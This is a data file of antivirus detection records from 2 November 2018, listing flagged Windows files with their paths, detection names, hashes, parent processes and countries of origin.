  Row(detection=Row(filename='navnet_garmin_v359.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\IDM\\DwnlData\\X230\\navnet_Garmin_v359_276\\navnet_Garmin_v359.exe', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline='-Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3952696, timestamp='2018-11-02T00:41:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2B281F21B6EC5E53939A80DF65B9B361FCE25140E055722265D95073211FA812', filesize=192000, name='TR/Crypt.ZPACK.Gen.#M300.#R555'), hash='2b281f21b6ec5e53939a80df65b9b361fce25140e055722265d95073211fa812', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:45:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks\\images\\images.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='40907cdd3aefe9e46592ac5e0c1308c4aa37a4d92a274b566f820b6085cc953e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:06:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153856-086d831e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-153856-086D831E', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='paths.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\PATHS\\PATHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatantfs.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATANTFS.exe", filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='1e6b47af63ca010186635f64f9a1278fb1460b97c88500f9980345fc2c5601fc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R+Sn98fajEKZ9QV1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:43:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180244-4ff2d094', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180244-4FF2D094', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160827-57763ea5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_883459d8\\AVSCAN-20181102-160745-5054AED1\\AVSCAN-20181102-160827-57763EA5', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125638-f00219aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125638-F00219AA', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104832-5be26bfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104832-5BE26BFE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053230-a9b064ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053230-A9B064AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055611-f848887a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055611-F848887A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061949-45f84745', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061949-45F84745', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Program Files (x86)\\mitmproxy\\bin\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\mitmproxy-4.0.4-windows-installer.exe', parentsize=40538732, timestamp='2018-11-02T16:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rad0c5f3.tmp.exe', filepath='C:\\Documents and Settings\\X\\Local Settings\\Temp\\rad0C5F3.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.4d0fc7.#M1.#R1'), hash='4d0fc7144beedb0620a8f17931a6969970ed17c42d65de92cf54157233c0cc5a', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T14:27:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051525-46dfc7ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051525-46DFC7CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061941-40ff2d0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061941-40FF2D0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054218-08243791', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054218-08243791', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Decodare_Media_Masini\\vw\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Decodare_Media_Masini\\vw\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061211-34f35844', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061211-34F35844', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053159-971492f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053159-971492F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050304-8ce42223', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050304-8CE42223', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122149-6bcd2197', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122149-6BCD2197', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151252-deaee903', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-151252-DEAEE903', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051521-43fca0d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051521-43FCA0D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055641-0a985971', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055641-0A985971', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061226-3dd7c9ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061226-3DD7C9EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001de9', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001de9', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-3935fcba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-3935FCBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053100-73cb7587', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053100-73CB7587', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060614-5fa93a66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060614-5FA93A66', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054602-8d5e81ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054602-8D5E81EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055149-5c97582a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055149-5C97582A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061016-efe795ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061016-EFE795EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062433-ef3cc2ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062433-EF3CC2AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:32Z'), dt=datetime.date(2018, 11, 2)),
